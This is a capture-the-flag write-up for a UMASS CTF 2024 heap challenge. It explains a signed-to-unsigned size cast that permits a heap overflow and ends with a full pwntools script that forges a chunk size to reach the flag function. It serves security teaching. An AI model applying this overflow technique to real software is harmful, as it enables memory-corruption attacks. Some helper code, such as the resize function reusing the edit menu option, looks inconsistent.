UMASS CTF 2024 [PWN] "mitigations are awesome"

Introduction

In this writeup, we’ll discuss the process of exploiting a heap-based vulnerability to retrieve the flag. The challenge involves interacting with a menu-driven program that allows memory allocation, resizing, editing, and flag retrieval.

We have a total of four files for this challenge:

1. pwn_mitigations_are_awesome_static_chall
2. pwn_mitigations_are_awesome_static_wrapper
3. pwn_mitigations_are_awesome_static_chall.c
4. pwn_mitigations_are_awesome_static_wrapper.c

The security features of the binary pwn_mitigations_are_awesome_static_chall as determined by the checksec utility are as follows:

• Architecture: amd64-64-little
• RELRO: Partial RELRO (Relocation Read-Only)
• Stack: Canary found (Stack Canary protection enabled)
• NX: NX enabled (Non-Executable Stack)
• PIE: No PIE (Position-Independent Executable)

The file type and characteristics of pwn_mitigations_are_awesome_static_chall are:

./pwn_mitigations_are_awesome_static_chall: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=eb2b37ea2af6e9d65ef7caf4a1f3ad9d
d974a40a, for GNU/Linux 3.2.0, not stripped

Analysis

// redacted ...
#define NUM_ALLOCS 10
 
typedef struct allocation {
    char *buf;
    int magic;
} Allocation;
 
// redacted ...
 
int win() {
	printf("The flag is: %s\n", getenv("FLAG"));
	exit(1);
}
 
int main() {
    int choice;
    Allocation allocation_array [NUM_ALLOCS];
    int cur_alloc_index = 0;
    int sz, idx;
    char *heap;
 
    while (1) {
        print_menu();
        printf("What action do you want to take?\n");
        choice = get_num();
 
        switch (choice) {
            case 1:
				// redacted
            case 2:
                // redacted
                break;
            case 3:
				// redacted
                break;
            case 4:
                heap = malloc(0x20);
                if (strcmp(heap, "Ez W") == 0) {
                    win();
                } else {
                    printf("Hah, you missed your shot!\n");
                    exit(0);
                }
 
                break;
            case 5:
                printf("Goodbye, you will never find a safer program!\n\n");
                exit(0);
            default:
                printf("Invalid option!\n\n");
        }
    }
}

The sz variable is initially declared as a signed int, but in the line:

read(0, allocation_array[idx].buf, (unsigned int)sz);

It’s cast to an unsigned int. This casting behavior means that if we input a negative number for sz, it will be interpreted as a large positive number due to the two’s complement representation used for signed integers. This could potentially allow us to write a sizable buffer into memory. However, the absence of a size check limits the significance of this casting behavior, though it’s noteworthy for analysis.

Moving on, the subsequent code segment aims to ensure that the string Ez W is present in the allocated heap memory:

heap = malloc(0x20);
if (strcmp(heap, "Ez W") == 0) {
	win();
} else {
	printf("Hah, you missed your shot!\n");
	exit(0);
}

Our objective is to write data into the heap without causing corruption, ensuring that the string Ez W is present when the malloc function is called. This is crucial because the win function is invoked when the allocated heap memory contains the string Ez W, leading to the retrieval of the flag. Therefore, our strategy revolves around manipulating the heap to achieve this specific memory layout.

Exploit Strategy

1. We allocate a chunk of memory with a size larger than expected (120 bytes).
2. Using the edit function, we perform an out-of-bounds write by appending our payload (Ez W) after overflowing the allocated buffer.
3. The payload structure includes a cyclic pattern for padding, a specific value (0x0000000000020811) to overwrite the size of the next heap chunk, and our target payload ("Ez W"), this way when we request a new chunk using malloc it will return the address of this fake chunk which contains the string Ez W.
4. After manipulating the memory layout, we trigger the flag retrieval function (get_flag) by selecting the corresponding menu option.

Exploit

And here’s the final exploit

from pwn import *
 
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)
 
gdbscript = '''
init-pwndbg
b *0x00000000004019ca # address of heap is stored in rax
'''.format(**locals())
 
exe = './chal'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
 
# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================
 
n2b = lambda x: f"{x}".encode("ascii")
 
def alloc(size):
	io.recvuntil(b"you want to take?\n")
	io.sendline(n2b(1))
	io.recvuntil(b"the allocation be?\n")
	io.sendline(n2b(size))
 
def edit(idx, data, size):
	io.recvuntil(b"you want to take?\n")
	io.sendline(n2b(3))
	io.recvuntil(b"do you wish to edit?\n")
	io.sendline(n2b(idx))
	io.recvuntil(b"want to write to the buffer?\n")
	io.sendline(n2b(size))
	io.recvuntil(b"Now be good and don't go out of bounds!\n")
	io.sendline(data)
	
def resize(idx, new_size):
	io.recvuntil(b"you want to take?\n")
	io.sendline(n2b(3))
	io.recvuntil(b"do you wish to resize?\n")
	io.sendline(n2b(idx))
	io.recvuntil(b"should the new size be?\n")
	io.sendline(n2b(new_size))
	
def get_flag():
	io.recvuntil(b"you want to take?\n")
	io.sendline(n2b(4))	
 
# Start program
io = start()
 
target_payload = b"Ez W"
next_chunk_size = 0x0000000000020811
 
alloc(120)
edit(0, cyclic(120) + p64(next_chunk_size) + target_payload + b"\x00", -1)
get_flag()